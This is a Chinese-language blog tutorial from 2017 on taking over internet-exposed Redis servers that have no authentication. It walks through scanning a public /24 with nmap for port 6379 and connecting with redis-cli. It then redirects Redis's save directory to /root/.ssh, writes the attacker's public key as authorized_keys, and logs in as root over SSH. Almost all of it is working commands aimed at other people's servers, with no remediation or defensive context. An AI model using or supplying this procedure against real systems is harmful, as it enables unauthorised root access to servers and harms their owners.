扫描公开外网端口的redis(未授权远程登录)服务器并提权简要教程

步骤:
1、扫描端口查找有redis服务的服务器
2、连接查看是否需要授权
3、查看config dir
4、设置config dir
5、生成私钥和公钥
6、上传公钥到服务器
7、把公钥设置到服务器私钥认证文件
8、使用私钥登陆服务器

第一步:
扫描端口看看有哪些redis服务在公网上可以直接访问到,redis默认端口是6379,扫描工具是nmap

nmap -sT -p 6379 110.110.110.0/24 | grep --color -B5 open

上面命令是扫码110.110.110.0的整个ip端开放有6379端口的服务器。

第二步:
连接看看能否连接上redis

redis-cli -h 扫描出来的ip

测试是否需要密钥

keys *

第三步:
查看config dir路径,看看是不是/root/.ssh

config get dir

第四步:
把config dir路径设置成/root/.ssh

config set dir "/root/.ssh"

第五步:
本地生成公私钥

ssh-keygen -t rsa

第六步:
上传公钥到服务器

(echo -e "\n\n";cat 公钥文件名.pub;echo -e "\n\n";) > test.txt
cat test.txt | redis-cli -h 服务器地址 -x set test

第七步:
设置redis文件存储到/root/.ssh里面去,由于redis里面存在了我们的公钥所以我们可以实现免密码登陆

config set dbfilename "authorized_keys"
save

第八步:
登陆服务器

ssh -i 私钥文件名 root@服务器ip
最后修改时间为:2017 年 02 月 05 日 11 时 25 分 AM
如果觉得我的文章对你有用,请随意赞赏

发表评论